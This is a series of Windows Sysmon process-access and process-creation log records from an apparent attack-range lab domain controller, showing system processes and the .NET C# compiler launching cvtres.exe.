{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4873,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.499\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.499","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4874,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.499\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.499","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4875,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.499\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.499","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4876,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.499\r\nSourceProcessGUID: {A837DB8D-0323-5F25-0000-001056960700}\r\nSourceProcessId: 2580\r\nSourceThreadId: 4128\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0324-5F25-0000-0010C9B90700}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.499","SourceProcessGUID":"{A837DB8D-0323-5F25-0000-001056960700}","SourceProcessId":"2580","SourceThreadId":"4128","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0324-5F25-0000-0010C9B90700}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4877,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.593\r\nProcessGuid: {A837DB8D-0324-5F25-0000-0010B6BD0700}\r\nProcessId: 2268\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESB5BB.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSC98474C796CF1402DB461D36FF17D23B1.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0323-5F25-0000-0020A2950700}\r\nLogonId: 0x795A2\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {A837DB8D-0324-5F25-0000-0010C9B90700}\r\nParentProcessId: 2984\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\wxerclml.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.593","ProcessGuid":"{A837DB8D-0324-5F25-0000-0010B6BD0700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESB5BB.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSC98474C796CF1402DB461D36FF17D23B1.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0323-5F25-0000-0020A2950700}","LogonId":"0x795a2","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{A837DB8D-0324-5F25-0000-0010C9B90700}","ParentProcessId":"2984","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\wxerclml.cmdline\"","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4878,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.593\r\nSourceProcessGUID: {A837DB8D-0324-5F25-0000-0010C9B90700}\r\nSourceProcessId: 2984\r\nSourceThreadId: 4728\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {A837DB8D-0324-5F25-0000-0010B6BD0700}\r\nTargetProcessId: 2268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.593","SourceProcessGUID":"{A837DB8D-0324-5F25-0000-0010C9B90700}","SourceProcessId":"2984","SourceThreadId":"4728","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{A837DB8D-0324-5F25-0000-0010B6BD0700}","TargetProcessId":"2268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4879,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.593\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0324-5F25-0000-0010B6BD0700}\r\nTargetProcessId: 2268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.593","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0324-5F25-0000-0010B6BD0700}","TargetProcessId":"2268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4880,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.593\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.593","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
